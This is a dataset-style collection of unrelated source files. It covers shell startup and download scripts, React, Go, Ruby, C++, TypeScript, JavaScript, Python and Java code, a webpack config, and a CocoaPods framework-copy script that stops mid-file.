text stringlengths 1 1.05M |
|---|
#!/bin/bash
# Starts a Komodo notary node plus its assetchains, checks/imports the notary
# address on each chain, then builds iguana.

# Fetch the notary public key used to launch komodod and the assetchains.
pubkey=$(./printkey.py pub)

# Start the main KMD daemon in the background as a notary node.
echo "[KMD] : Starting KMD"
komodod -notary -pubkey="$pubkey" > /dev/null 2>&1 &

# Start all assetchains; ./assetchains prints "finished" on success.
if [[ $(./assetchains) = "finished" ]]; then
    echo "Started Assetchains"
else
    echo "Starting Assetchains Failed: help human!"
    # BUG FIX: bare `exit` propagated the (successful) status of the previous
    # echo; exit non-zero so callers can detect the failure.
    exit 1
fi

# Validate Address on KMD + AC, will poll deamon until started then check if address is imported, if not import it.
echo "[KMD] : Checking your address and importing it if required."
echo "[KMD] : $(./validateaddress.sh KMD)"

./listassetchains.py | while read -r chain; do
    # Move our auto generated coins file to the iguana coins dir
    chmod +x "${chain}_7776"
    mv "${chain}_7776" iguana/coins
    echo "[$chain] : $(./validateaddress.sh "$chain")"
done

echo "Building Iguana"
./build_iguana
echo "Finished: Please check ALL your chains are synced before running start_iguana.sh"
|
<filename>src/components/input/Radio/index.js<gh_stars>1-10
import React from 'react'
import PropTypes from 'prop-types'
import classNames from 'utils/classnames'
import Accordion from 'components/accordion/BaseAccordion'
import InputError from 'components/input/InputError'
const Radio = props => {
const {
name,
value,
error,
showError,
checked,
onChange,
className,
modifier,
label,
id
} = props
const hasError = showError && error && !!error.length
const modifiedClassNames = classNames('radio', className, modifier)
return (
<div className={modifiedClassNames}>
<label htmlFor={id} className='radio__label'>
<input
className='radio__input'
type='radio'
id={id}
name={name}
value={value}
checked={checked}
onChange={(e) => { onChange(e) }}
/>
<span className='radio__button'></span>
<h5 className='radio__label__text'>{label}</h5>
</label>
<Accordion
className='input__accordion'
isOpen={hasError}>
<InputError
className='micro'
errors={error} />
</Accordion>
</div>
)
}
Radio.propTypes = {
name: PropTypes.string,
value: PropTypes.string,
checked: PropTypes.bool
}
Radio.defaultProps = {
checked: false
}
export default Radio
|
<reponame>kellymclaughlin/go-fastly
package fastly
import (
"bytes"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"reflect"
"strconv"
"time"
"github.com/google/jsonapi"
)
// Event represents an event_logs item response from the Fastly API.
// Field-to-JSON mapping is driven entirely by the jsonapi struct tags.
type Event struct {
	ID          string                 `jsonapi:"primary,event"`
	CustomerID  string                 `jsonapi:"attr,customer_id"`
	Description string                 `jsonapi:"attr,description"`
	EventType   string                 `jsonapi:"attr,event_type"`
	IP          string                 `jsonapi:"attr,ip"`
	Metadata    map[string]interface{} `jsonapi:"attr,metadata,omitempty"`
	ServiceID   string                 `jsonapi:"attr,service_id"`
	UserID      string                 `jsonapi:"attr,user_id"`
	CreatedAt   *time.Time             `jsonapi:"attr,created_at,iso8601"`
	Admin       bool                   `jsonapi:"attr,admin"`
}
// GetAPIEventsFilterInput is used as input to the GetAPIEvents function.
// Zero-valued fields are omitted from the query (see formatEventFilters).
type GetAPIEventsFilterInput struct {
	// CustomerID to Limit the returned events to a specific customer.
	CustomerID string
	// ServiceID to Limit the returned events to a specific service.
	ServiceID string
	// EventType to Limit the returned events to a specific event type. See above for event codes.
	EventType string
	// UserID to Limit the returned events to a specific user.
	UserID string
	// PageNumber is the pagination page number (starts at 1; 0 means
	// "fetch all pages" — see interpretAPIEventsPage).
	PageNumber int
	// MaxResults is the number of items to return on each paginated page.
	MaxResults int
}
// eventLinksResponse is used to pull the "Links" pagination fields from
// a call to Fastly; these are excluded from the results of the jsonapi
// call to `UnmarshalManyPayload()`, so we have to fetch them separately.
// type EventLinksResponse struct {
//	Links EventsPaginationInfo `json:"links"`
// }

// EventsPaginationInfo stores links to searches related to the current one,
// showing any information about additional results being stored on another
// page. An empty Next means there are no further pages.
type EventsPaginationInfo struct {
	First string `json:"first,omitempty"`
	Last  string `json:"last,omitempty"`
	Next  string `json:"next,omitempty"`
}
// GetAPIEventsResponse is the data returned to the user from a GetAPIEvents call.
// Events accumulates items across pages; Links reflects the most recently
// fetched page's pagination block.
type GetAPIEventsResponse struct {
	Events []*Event
	Links  EventsPaginationInfo `json:"links"`
}
// GetAPIEvents lists all the events for a particular customer, applying the
// filters in i and (when i.PageNumber is 0) following pagination links.
//
// NOTE: eventsResponse may be partially populated before an error is
// encountered, so the presence of results doesn't preclude the presence of
// an error.
func (c *Client) GetAPIEvents(i *GetAPIEventsFilterInput) (GetAPIEventsResponse, error) {
	eventsResponse := GetAPIEventsResponse{
		Events: []*Event{},
		Links:  EventsPaginationInfo{},
	}

	path := "/events"
	filters := &RequestOptions{Params: i.formatEventFilters()}

	resp, err := c.Get(path, filters)
	if err != nil {
		return eventsResponse, err
	}
	// BUG FIX: the response body was never closed, leaking the connection.
	defer resp.Body.Close()

	err = c.interpretAPIEventsPage(&eventsResponse, i.PageNumber, resp)
	return eventsResponse, err
}
// GetAPIEventInput is used as input to the GetAPIEvent function.
type GetAPIEventInput struct {
	// EventID is the ID of the event and is required.
	EventID string
}

// GetAPIEvent gets a specific event by its ID.
func (c *Client) GetAPIEvent(i *GetAPIEventInput) (*Event, error) {
	if i.EventID == "" {
		return nil, ErrMissingEventID
	}

	path := fmt.Sprintf("/events/%s", i.EventID)
	resp, err := c.Get(path, nil)
	if err != nil {
		return nil, err
	}
	// BUG FIX: the response body was never closed, leaking the connection.
	defer resp.Body.Close()

	var event Event
	if err := jsonapi.UnmarshalPayload(resp.Body, &event); err != nil {
		return nil, err
	}
	return &event, nil
}
// interpretAPIEventsPage accepts a Fastly events response and unmarshals the
// results into answer. When pageNum is 0 (no specific page requested) and the
// response advertises a "next" link, it fetches and folds in subsequent pages
// until all results have been gathered.
func (c *Client) interpretAPIEventsPage(answer *GetAPIEventsResponse, pageNum int, received *http.Response) error {
	// Pull the pagination links out of the body before handing it to jsonapi,
	// which consumes the reader.
	pages, body, err := getEventsPages(received.Body)
	if err != nil {
		return err
	}
	answer.Links = pages

	data, err := jsonapi.UnmarshalManyPayload(body, reflect.TypeOf(new(Event)))
	if err != nil {
		return err
	}
	for i := range data {
		typed, ok := data[i].(*Event)
		if !ok {
			return fmt.Errorf("got back response of unexpected type")
		}
		answer.Events = append(answer.Events, typed)
	}

	// Only auto-paginate when the caller did not pin a specific page.
	if pageNum == 0 && pages.Next != "" {
		// NOTE: pages.Next URL includes filters already.
		resp, err := c.SimpleGet(pages.Next)
		if err != nil {
			return err
		}
		// Close the bodies of pages we fetched ourselves (the caller owns
		// `received`).
		defer resp.Body.Close()
		// BUG FIX: the recursive call's error was previously discarded.
		return c.interpretAPIEventsPage(answer, pageNum, resp)
	}
	return nil
}
// getEventsPages parses a response body to extract the pagination data
// without destroying the stream: it reads the body once and returns a fresh
// reader over the same bytes so the caller can consume them again.
func getEventsPages(body io.Reader) (EventsPaginationInfo, io.Reader, error) {
	bodyBytes, err := ioutil.ReadAll(body)
	if err != nil {
		return EventsPaginationInfo{}, nil, err
	}
	// BUG FIX: the unmarshal error was ignored and the target was a nil
	// pointer, so malformed JSON panicked on the pages.Links dereference.
	var pages GetAPIEventsResponse
	if err := json.Unmarshal(bodyBytes, &pages); err != nil {
		return EventsPaginationInfo{}, nil, err
	}
	return pages.Links, bytes.NewReader(bodyBytes), nil
}
// formatEventFilters converts user input into query parameters for filtering
// Fastly events. Zero values (empty string, 0) are omitted, so none of the
// filters can deliberately be set to their zero value; that isn't needed at
// present.
func (i *GetAPIEventsFilterInput) formatEventFilters() map[string]string {
	pairings := map[string]interface{}{
		"filter[customer_id]": i.CustomerID,
		"filter[service_id]":  i.ServiceID,
		"filter[event_type]":  i.EventType,
		"filter[user_id]":     i.UserID,
		"page[size]":          i.MaxResults,
		"page[number]":        i.PageNumber, // starts at 1, not 0
	}

	result := map[string]string{}
	for key, raw := range pairings {
		switch v := raw.(type) {
		case string:
			if v != "" {
				result[key] = v
			}
		case int:
			if v != 0 {
				result[key] = strconv.Itoa(v)
			}
		}
	}
	return result
}
|
require 'spec_helper'

# Feature specs for JS confirm dialogs on links, buttons and forms, run both
# with and without Turbolinks navigation (toggled via USE_TURBOLINKS).
describe 'basic confirms', js: true, type: :feature do
  before do
    if ENV['USE_TURBOLINKS']
      # Navigate via Turbolinks so the confirm handlers are exercised on a
      # Turbolinks-visited page rather than a full page load.
      visit root_path
      page.execute_script('Turbolinks.visit("/confirms_page");')
      #find_link('Index').trigger('click')
    else
      visit root_path
      click_link 'Index'
    end
  end

  # Shared behaviour for any confirm-protected element: the dialog appears,
  # "Cancel" aborts, "Ok" proceeds. `is_cow_deleted` selects which success
  # message is expected; `is_remote` skips the follow-link example (remote
  # links assert their ajax result in their own example below).
  shared_examples 'Confirm shows correctly' do |is_cow_deleted, is_remote|
    let(:got_cow) { 'You got a pretty cow' }
    let(:deleted_cow) { 'You murdered a silly cow' }
    let(:message) { is_cow_deleted ? deleted_cow : got_cow }

    it 'doesnt follow the link when click' do
      expect(page).to have_content('Are you sure?')
      expect(page).not_to have_content(message)
    end

    it 'doesnt follow the link when click on cancel' do
      # Sleeps give the dialog animation time to settle before interacting.
      sleep 1
      expect(page).to_not have_content(message)
      click_button('Cancel')
      sleep 1
      expect(page).to_not have_content(message)
    end

    it 'goes to the link after accept confirm' do
      #click_on '.confirm'
      expect(page).to_not have_content(message)
      sleep 1
      click_button('Ok')
      expect(page).to have_content(message)
    end unless is_remote
  end

  describe 'normal links' do
    before do
      #visit confirms_page_path
      find_link("Basic confirm").trigger('click')
    end
    it_behaves_like 'Confirm shows correctly'
  end

  describe 'methods links' do
    before do
      find_link("Delete confirm").trigger('click')
      sleep 2
    end
    it_behaves_like 'Confirm shows correctly', true
  end

  describe 'remote links' do
    before do
      find_link("Remote confirm").trigger('click')
      sleep 3
    end
    it_behaves_like 'Confirm shows correctly', true, true

    it 'ajax change content in the page after accept confirm' do
      #click_on '.confirm'
      sleep 3
      expect(page).to_not have_content('You murdered a silly cow with ajax')
      sleep 3
      click_button('Ok')
      expect(page).to have_content('You murdered a silly cow with ajax')
    end
  end

  describe 'Custom confirm' do
    before do
      visit confirms_page_path
    end

    it 'when click on a link with a confirm and have custom options' do
      find_link("Custom confirm").trigger('click')
      sleep 1
      # Custom options override button text, dialog type, title and subtitle.
      expect(page).to have_css('.confirm', text: 'Im ready')
      expect(page).to have_css('.cancel', text: 'No way')
      expect(page).to have_css('.sa-info', visible: true)
      expect(page).to have_css('h2', text: 'Are you ready?')
      expect(page).to have_css('p', text: 'This is a subtitle')
    end
  end

  describe 'Submit confirm' do
    before do
      #visit confirms_page_path
      find("#submit-delete").trigger('click')
    end
    it_behaves_like 'Confirm shows correctly', true
  end

  describe 'button_tag links' do
    before do
      #visit confirms_page_path
      find_button("Button_tag confirm").trigger('click')
    end
    it_behaves_like 'Confirm shows correctly', true
  end
end
|
#!/usr/bin/env bash
# Request a checkout of one specific bundle (by UUID) from the AWS replica
# via the dbio DSS CLI.
dbio dss post-bundles-checkout --replica aws --uuid fff746b3-e3eb-496a-88a3-5fa1fa358392
|
#include "./Civilization.hpp"
#include "Bubble.hpp"
namespace Emperor2
{
    // Sorts the `civilizations` array in place by ascending population using
    // bubble sort, and returns the same array pointer for convenience.
    Civilization *Bubble::BubbleSort(Civilization *civilizations, int numberOfCivilizations)
    {
        // After each outer pass the largest remaining population has bubbled
        // to the end, so the inner scan shrinks by one element per pass.
        for (int pass = 0; pass < numberOfCivilizations - 1; pass++)
        {
            for (int idx = 0; idx < numberOfCivilizations - pass - 1; idx++)
            {
                const bool outOfOrder =
                    civilizations[idx].population > civilizations[idx + 1].population;
                if (outOfOrder)
                {
                    // Exchange the neighbouring pair.
                    Civilization held = civilizations[idx];
                    civilizations[idx] = civilizations[idx + 1];
                    civilizations[idx + 1] = held;
                }
            }
        }
        return civilizations;
    }
} // namespace Emperor2
<reponame>dogballs/battle-city<gh_stars>10-100
import { GameObject, Rect } from '../../core';
import { TerrainFactory, TerrainType } from '../../terrain';
import * as config from '../../config';
// EditorBrush is a game object that fills its own area with tiles of a
// selected terrain type. Presumably it is the level editor's paint-preview
// cursor — TODO confirm against the editor scene that instantiates it.
export class EditorBrush extends GameObject {
  public type: TerrainType;
  // Render above regular content (z-index comes from editor config).
  public zIndex = config.EDITOR_BRUSH_Z_INDEX;

  constructor(width: number, height: number, type: TerrainType) {
    super(width, height);
    this.type = type;
  }

  protected setup(): void {
    // Cover the full brush rectangle with tiles of the chosen terrain type.
    const tiles = TerrainFactory.createFromRegions(this.type, [
      new Rect(0, 0, this.size.width, this.size.height),
    ]);
    for (const tile of tiles) {
      // Tiles sit one layer above the brush object itself.
      tile.setZIndex(this.zIndex + 1);
      this.add(tile);
    }
  }
}
|
<filename>integer/circleOfNumbers_cf-134/solution.js
/*
Consider integer numbers from 0 to n - 1 written down along the circle in such a way that the distance between any two neighboring numbers is equal (note that 0 and n - 1 are neighboring, too).
Given n and firstNumber, find the number which is written in the radially opposite position to firstNumber.
Example
For n = 10 and firstNumber = 2, the output should be
circleOfNumbers(n, firstNumber) = 7.
Input/Output
[execution time limit] 4 seconds (js)
[input] integer n
A positive even integer.
Guaranteed constraints:
4 ≤ n ≤ 20.
[input] integer firstNumber
Guaranteed constraints:
0 ≤ firstNumber ≤ n - 1.
[output] integer
*/
/**
 * Returns the number written radially opposite `firstNumber` on a circle of
 * the integers 0..n-1 (n is guaranteed even, per the problem constraints).
 */
function circleOfNumbers(n, firstNumber) {
  // The opposite position sits exactly half the circle away; the modulo
  // handles wrapping past n - 1.
  return (firstNumber + n / 2) % n;
}

// Sample inputs with their expected outputs noted alongside.
const samples = [
  [10, 2], // 7
  [10, 7], // 2
  [4, 1], // 3
  [6, 3], // 0
  [18, 6], // 15
  [12, 10], // 4
  [18, 5], // 14
];
samples.forEach((args) => console.log(circleOfNumbers(...args)));
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from six import string_types
from six.moves.urllib.parse import urlparse
def config_proxy_skip(proxies, uri, skip_proxy=False):
    """
    Return an amended copy of the proxies dictionary - used by `requests`,
    it will disable the proxy if the uri provided is to be reached directly.

    The caller's dict is never mutated (BUG FIX: the previous implementation
    modified it in place despite documenting a copy).

    Keyword Arguments:
        proxies -- dict with existing proxies: 'https', 'http', 'no' as potential keys
        uri -- uri to determine if proxy is necessary or not.
        skip_proxy -- if True, the proxy dictionary returned will disable all proxies
    """
    # Work on a shallow copy so the caller's mapping is left untouched.
    proxies = dict(proxies)
    parsed_uri = urlparse(uri)

    # disable proxy if necessary
    if skip_proxy:
        # Empty strings tell `requests` to bypass proxies entirely.
        proxies['http'] = ''
        proxies['https'] = ''
    elif proxies.get('no'):
        # 'no' may be a comma/semicolon separated string or a list of hosts.
        if isinstance(proxies['no'], str):
            urls = proxies['no'].replace(';', ',').split(",")
        elif isinstance(proxies['no'], list):
            urls = proxies['no']
        else:
            urls = []
        for url in urls:
            if url in parsed_uri.netloc:
                # Host is exempt: drop both proxy entries if present.
                proxies.pop('http', None)
                proxies.pop('https', None)
    return proxies
|
<reponame>MieskeB/json-api-spring-boot
package nl.michelbijnen.jsonapi.test;
import nl.michelbijnen.jsonapi.parser.JsonApiConverter;
import nl.michelbijnen.jsonapi.test.mock.MockDataGenerator;
import nl.michelbijnen.jsonapi.test.mock.ObjectDto;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.Test;
import java.util.ArrayList;
import java.util.List;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
/**
 * Verifies that JsonApiConverter serializes a List of DTOs into a JSON:API
 * document: a "links" object plus a "data" array whose entries carry the
 * expected "id" and "type" members.
 */
public class ListTest {

    private List<ObjectDto> objectDtos;

    @Before
    public void before() throws CloneNotSupportedException {
        // Build a fresh two-element list from cloned mock DTOs so each test
        // works on independent copies of the generator's template object.
        MockDataGenerator generator = MockDataGenerator.getInstance();
        this.objectDtos = new ArrayList<>();
        this.objectDtos.add((ObjectDto) generator.getObjectDto().clone());
        this.objectDtos.add((ObjectDto) generator.getObjectDto().clone());
    }

    @Test
    public void testIfLinksExists() {
        JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
        assertNotNull(jsonObject.getJSONObject("links"));
    }

    @Test
    public void testIfDataExists() {
        JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
        assertNotNull(jsonObject.getJSONArray("data"));
    }

    @Test
    public void testIfDataContainsId() {
        // Entry order in "data" must match the input list order.
        JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
        assertEquals(objectDtos.get(0).getId(), jsonObject.getJSONArray("data").getJSONObject(0).getString("id"));
        assertEquals(objectDtos.get(1).getId(), jsonObject.getJSONArray("data").getJSONObject(1).getString("id"));
    }

    @Test
    public void testIfDataContainsType() {
        JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
        assertEquals("Object", jsonObject.getJSONArray("data").getJSONObject(0).getString("type"));
        assertEquals("Object", jsonObject.getJSONArray("data").getJSONObject(1).getString("type"));
    }
}
|
#!/usr/bin/env bash
# This script lets users download their team's private cli completion specs
# from fig's cloud. (NOTE(review): the original header said "upload", but the
# endpoints and subcommand below are for downloading.)

# Terminal styling sequences used by the user-facing messages.
MAGENTA=$(tput setaf 5)
RED=$(tput setaf 1)
BOLD=$(tput bold)
NORMAL=$(tput sgr0)
HIGHLIGHT=$(tput smso)
HIGHLIGHT_END=$(tput rmso)
TAB=' '

# Print an indented line followed by a blank line, resetting styling.
print_special() {
echo "${TAB}$@${NORMAL}"$'\n'
}

#####################################
# State
#####################################

# Make sure dev_mode != 1 when this is pushed live
dev_mode=0

if [[ "$dev_mode" == '1' ]]
then
echo
echo "currently in dev mode"
echo
filename_endpoint="http://localhost:3000/autocomplete/team-file-name"
download_endpoint="http://localhost:3000/autocomplete/download-team-file"
else
filename_endpoint="https://api.fig.io/autocomplete/team-file-name"
download_endpoint="https://api.fig.io/autocomplete/download-team-file"
fi

subcommand_name="team:download"
upload_subcommand_name="team:upload"
# Tell the user their Fig login token is missing/invalid, instruct them to
# log out and back in, then abort the script with a failure status.
prompt_to_logout() {
# cat <<EOF
echo
print_special "${BOLD}It looks like you are not properly logged into ${MAGENTA}Fig${NORMAL}"
echo
print_special "Please logout using ${BOLD}${MAGENTA}fig util:logout${NORMAL} then log back in and try again"

# The automatic-logout flow below is intentionally disabled; the user is
# asked to log out manually instead.
# print_special "Fig will log you out and prompt you to log in again"
# echo
# print_special "When you've logged back in, please re-run ${BOLD}fig $subcommand_name ${NORMAL}"
# echo
# echo
# # https://serverfault.com/questions/532559/bash-script-count-down-5-minutes-display-on-single-line
# # Countdown timer
# secs=$((8))
# print_special "Press ctrl + c to cancel"
# while [ $secs -gt 0 ]; do
#    echo -ne "${TAB}Time remaining before logout: $secs\033[0K\r"
#    sleep 1
#    : $((secs--))
# done
# fig util:logout
exit 1
}
#####################################
# Check token exists locally and is valid
#####################################

local_access_token=$(defaults read com.mschrage.fig access_token 2> /dev/null)

# BUG FIX: quote the expansion — an empty token would previously make the
# test `[ -z ]`, which evaluates true by accident rather than by design.
if [ -z "$local_access_token" ]
then
prompt_to_logout
fi

#####################################
# Make post request to fig server
#####################################

# Ask the server which spec file is associated with this team.
file_name=$(curl -s -X POST \
-H "Authorization: Bearer $local_access_token" \
$filename_endpoint 2> /dev/null)

#####################################
# Support
#####################################

if [[ "$file_name" == ERROR* ]]
then
cat <<EOF
${BOLD}${RED}Error${NORMAL}
$file_name
There was an error downloading your team's private completion specs.
Please contact ${BOLD}hello@fig.io${NORMAL} for support
EOF
# BUG FIX: the script previously fell through and attempted the download
# even after reporting a server error.
exit 1
elif [ -z "$file_name" ]
then
cat <<EOF
There don't seem to be any private completion specs associated with your team's domain.
Are you sure you / your team have uploaded private completion specs?
--
To upload completion specs, use:
fig $upload_subcommand_name <file path to private completion spec>
${BOLD}Examples${NORMAL}
fig $upload_subcommand_name ~/.fig/team/acme.js
fig $upload_subcommand_name /path/to/acme.js
EOF
# BUG FIX: nothing to download, so stop here instead of falling through.
exit 0
fi

# If we are here, we know we have a file that exists
# https://stackoverflow.com/questions/21950049/create-a-text-file-in-node-js-from-a-string-and-stream-it-in-response
# -o "$file_name"
result=$(curl -s -X POST \
-H "Authorization: Bearer $local_access_token" \
$download_endpoint \
2> /dev/null )

if [[ -z "$result" ]] || [[ "$result" == ERROR* ]]
then
cat <<EOF
${BOLD}${MAGENTA}Error${NORMAL}
$result
There was an error downloading and/or saving your team's private autocomplete spec ${BOLD}${MAGENTA}$file_name${NORMAL}
If this problem persists, please contact hello@fig.io for support.
EOF
# Exit non-zero so callers can detect the failed download.
exit 1
else
# Save the spec under ~/.fig/team and expose it to autocomplete via symlink.
touch ~/.fig/team/"$file_name"
echo "$result" > ~/.fig/team/"$file_name"

# symlink and force option
ln -fs ~/.fig/team/"$file_name" ~/.fig/autocomplete/"$file_name"
cat <<EOF
${BOLD}${MAGENTA}Success${NORMAL}
Your team's completion spec ${BOLD}${MAGENTA}$file_name${NORMAL} was successfully downloaded/updated.
EOF
fi
|
const path = require('path');
// const UglifyWebpackPlugin = require('uglifyjs-webpack-plugin');
const TerserPlugin = require('terser-webpack-plugin');
// Webpack configuration: bundles ./browser/index.js into a UMD build
// (dist/adarender.js) exposed under the library name `adarender`.
module.exports = {
  entry: './browser/index.js',
  output: {
    path: path.resolve(__dirname, 'dist'),
    filename: 'adarender.js',
    libraryTarget: 'umd',
    library: 'adarender',
  },
  module: {
    rules: [
      {
        // Transpile our own browser sources with Babel; node_modules and
        // bower_components are excluded.
        test: /\.js?$/,
        include: path.resolve(__dirname, './browser'),
        exclude: /(node_modules|bower_components)/,
        use: {
          loader: 'babel-loader',
          options: {
            presets: ['@babel/preset-env'],
          },
        },
      },
      {
        // Inline images up to 10 kB as data URIs via url-loader.
        test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
        use: [
          {
            loader: 'url-loader',
            options: {
              limit: 10000,
            },
          },
        ],
      },
      {
        test: /\.css$/,
        use: ['style-loader', 'css-loader'],
      },
      {
        // Same inlining strategy for font files.
        test: /\.(woff2?|eot|ttf|otf)(\?.*)?$/,
        use: [
          {
            loader: 'url-loader',
            options: {
              limit: 10000,
            },
          },
        ],
      },
    ],
  },
  optimization: {
    // Custom Terser minification is currently disabled (webpack defaults
    // apply); the TerserPlugin require at the top of the file is unused
    // while this stays commented out.
    // minimizer: [
    //   new TerserPlugin({
    //     ecma: 6,
    //     compress: true,
    //   }),
    // ],
  },
  externals: {
    // echarts is expected to be provided by the consuming page, not bundled.
    echarts: 'echarts',
  },
};
|
import requests

# Minimal example: fetch a URL and report whether the server answered with
# HTTP 200. Any other status code (or redirect-final status) prints an error.
url = 'https://www.example.com/'

response = requests.get(url)

if response.status_code == 200:
    print('Success!')
else:
    print('An error has occurred.')
<filename>config.ru
# Rack entry point: load Sinatra and the application class, then run it.
require 'sinatra'
require './app.rb'
run App
|
#!/bin/sh
# NOTE(review): this script uses bash-only constructs (`function`, `[[ ]]`,
# arrays, `trap ... ERR`) under a /bin/sh shebang; it works where /bin/sh is
# bash — confirm before running on platforms where it is not.
set -e
set -u
set -o pipefail

# Print the script path and failing line number when any command errors.
function on_error {
  echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR

if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
  # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
  # frameworks to, so exit 0 (signalling the script phase was successful).
  exit 0
fi

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
BCSYMBOLMAP_DIR="BCSymbolMaps"

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework into the app's Frameworks folder,
# installing any bundled bcsymbolmaps, re-signing, and (pre-Xcode 7)
# embedding Swift runtime libraries.
install_framework()
{
  # Resolve the source: prefer the full path under BUILT_PRODUCTS_DIR, then
  # its basename there, then the argument as a literal path.
  if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$1"
  elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
  elif [ -r "$1" ]; then
    local source="$1"
  fi

  local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

  if [ -L "${source}" ]; then
    echo "Symlinked..."
    source="$(readlink "${source}")"
  fi

  if [ -d "${source}/${BCSYMBOLMAP_DIR}" ]; then
    # Locate and install any .bcsymbolmaps if present, and remove them from the .framework before the framework is copied
    find "${source}/${BCSYMBOLMAP_DIR}" -name "*.bcsymbolmap"|while read f; do
      echo "Installing $f"
      install_bcsymbolmap "$f" "$destination"
      rm "$f"
    done
    rmdir "${source}/${BCSYMBOLMAP_DIR}"
  fi

  # Use filter instead of exclude so missing patterns don't throw errors.
  echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
  rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"

  local basename
  basename="$(basename -s .framework "$1")"
  binary="${destination}/${basename}.framework/${basename}"

  # Some products place the binary at the top level, or behind a symlink;
  # resolve to the actual file before stripping.
  if ! [ -r "$binary" ]; then
    binary="${destination}/${basename}"
  elif [ -L "${binary}" ]; then
    echo "Destination binary is symlinked..."
    dirname="$(dirname "${binary}")"
    binary="${dirname}/$(readlink "${binary}")"
  fi

  # Strip invalid architectures so "fat" simulator / device frameworks work on device
  if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
    strip_invalid_archs "$binary"
  fi

  # Resign the code if required by the build settings to avoid unstable apps
  code_sign_if_enabled "${destination}/$(basename "$1")"

  # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
  if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
    local swift_runtime_libs
    swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u)
    for lib in $swift_runtime_libs; do
      echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
      rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
      code_sign_if_enabled "${destination}/${lib}"
    done
  fi
}
# Copies and strips a vendored dSYM: rsyncs it into DERIVED_FILES_DIR, strips
# architectures not being built, then moves it to DWARF_DSYM_FOLDER_PATH (or
# touches a placeholder if stripping left nothing usable).
install_dsym() {
  local source="$1"
  warn_missing_arch=${2:-true}
  if [ -r "$source" ]; then
    # Copy the dSYM into the targets temp dir.
    echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
    rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"

    local basename
    basename="$(basename -s .dSYM "$source")"
    binary_name="$(ls "$source/Contents/Resources/DWARF")"
    binary="${DERIVED_FILES_DIR}/${basename}.dSYM/Contents/Resources/DWARF/${binary_name}"

    # Strip invalid architectures from the dSYM.
    if [[ "$(file "$binary")" == *"Mach-O "*"dSYM companion"* ]]; then
      strip_invalid_archs "$binary" "$warn_missing_arch"
    fi
    if [[ $STRIP_BINARY_RETVAL == 0 ]]; then
      # Move the stripped file into its final destination.
      # BUG FIX: the logged command previously referred to
      # "${basename}.framework.dSYM" while the executed rsync operates on
      # "${basename}.dSYM"; the log now matches what actually runs.
      echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
      rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
    else
      # The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
      touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.dSYM"
    fi
  fi
}
# Used as a return value for each invocation of `strip_invalid_archs` function.
# 0 = binary usable (possibly after stripping), 1 = no matching architectures.
STRIP_BINARY_RETVAL=0

